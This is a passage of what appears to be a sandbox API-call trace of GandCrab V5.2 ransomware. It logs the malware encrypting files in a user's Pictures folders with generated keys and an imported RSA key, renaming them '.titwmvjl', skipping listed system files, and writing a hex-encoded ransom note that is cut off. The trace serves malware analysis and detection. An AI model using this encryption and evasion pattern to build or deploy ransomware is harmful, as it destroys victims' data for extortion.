(hKey=0x503338) returned 1 [0094.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.202] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.202] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.203] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.203] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x14bd6, lpOverlapped=0x0) returned 1 [0094.217] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffeb42a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.217] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14bd6, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x14bd6, lpOverlapped=0x0) returned 1 [0094.218] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.218] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.220] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.223] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.224] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.224] CloseHandle (hObject=0x2d4) returned 1 [0094.224] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\pgm56ttuh5c hwzu.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\pgm56ttuh5c hwzu.png.titwmvjl"), dwFlags=0x1) returned 1 [0094.225] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.225] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.225] lstrcmpW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2=".") returned 1 [0094.225] lstrcmpW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="..") returned 1 [0094.226] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="qD wcp2Y53LlgRglr8_t.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg" [0094.226] lstrlenW (lpString=".titwmvjl") returned 9 [0094.226] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned 103 [0094.226] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.226] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg.titwmvjl") returned 112 [0094.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned 103 [0094.228] lstrlenW (lpString=".jpg") returned 4 [0094.228] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.228] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.228] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.228] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned 103 [0094.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned 103 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="desktop.ini") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="autorun.inf") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="ntuser.dat") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="iconcache.db") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="bootsect.bak") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="boot.ini") returned 1 [0094.228] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="ntuser.dat.log") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="thumbs.db") returned -1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="ntldr") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="NTDETECT.COM") returned 1 [0094.229] lstrcmpiW (lpString1="qD wcp2Y53LlgRglr8_t.jpg", lpString2="Bootfont.bin") returned 1 [0094.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg") returned 103 [0094.229] lstrlenW (lpString=".jpg") returned 4 [0094.229] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.229] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.229] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.229] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.229] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\qd wcp2y53llgrglr8_t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.230] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.230] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.231] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.231] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.231] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.232] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.232] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.232] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.232] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.232] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.233] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.233] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.233] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.233] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.233] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.234] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.234] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.234] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.234] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.234] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.234] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.234] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.234] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.235] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.235] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5033b8) returned 1 [0094.235] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.235] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.235] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.235] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.236] GetLastError () returned 0x0 [0094.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.236] CryptDestroyKey (hKey=0x5033b8) returned 1 [0094.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.236] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.236] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.236] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.237] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0094.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.237] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.237] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.237] GetLastError () returned 0x0 [0094.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.237] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.238] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.238] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.238] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.238] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xf2f, lpOverlapped=0x0) returned 1 [0094.251] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffff0d1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.251] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf2f, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xf2f, lpOverlapped=0x0) returned 1 [0094.252] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.252] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.266] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.270] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.271] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.271] CloseHandle (hObject=0x2d4) returned 1 [0094.271] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\qd wcp2y53llgrglr8_t.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\qD wcp2Y53LlgRglr8_t.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\qd wcp2y53llgrglr8_t.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.272] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.272] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.272] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.272] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt" [0094.273] lstrlenW (lpString=".titwmvjl") returned 9 [0094.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt") returned 99 [0094.273] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.273] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 108 [0094.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt") returned 99 [0094.273] lstrlenW (lpString=".txt") returned 4 [0094.273] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.273] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.273] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.273] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt") returned 99 [0094.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\TITWMVJL-DECRYPT.txt") returned 99 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.273] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.273] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.274] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0094.274] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0094.274] CloseHandle (hObject=0x2cc) returned 1 [0094.275] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.275] lstrcmpW (lpString1="9JLzUbTiz6", lpString2=".") returned 1 [0094.275] lstrcmpW (lpString1="9JLzUbTiz6", lpString2="..") returned 1 [0094.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="9JLzUbTiz6" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6" [0094.275] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\" [0094.275] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.275] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.276] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.276] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.276] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.276] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\\\TITWMVJL-DECRYPT.txt") returned 99 [0094.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0094.283] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f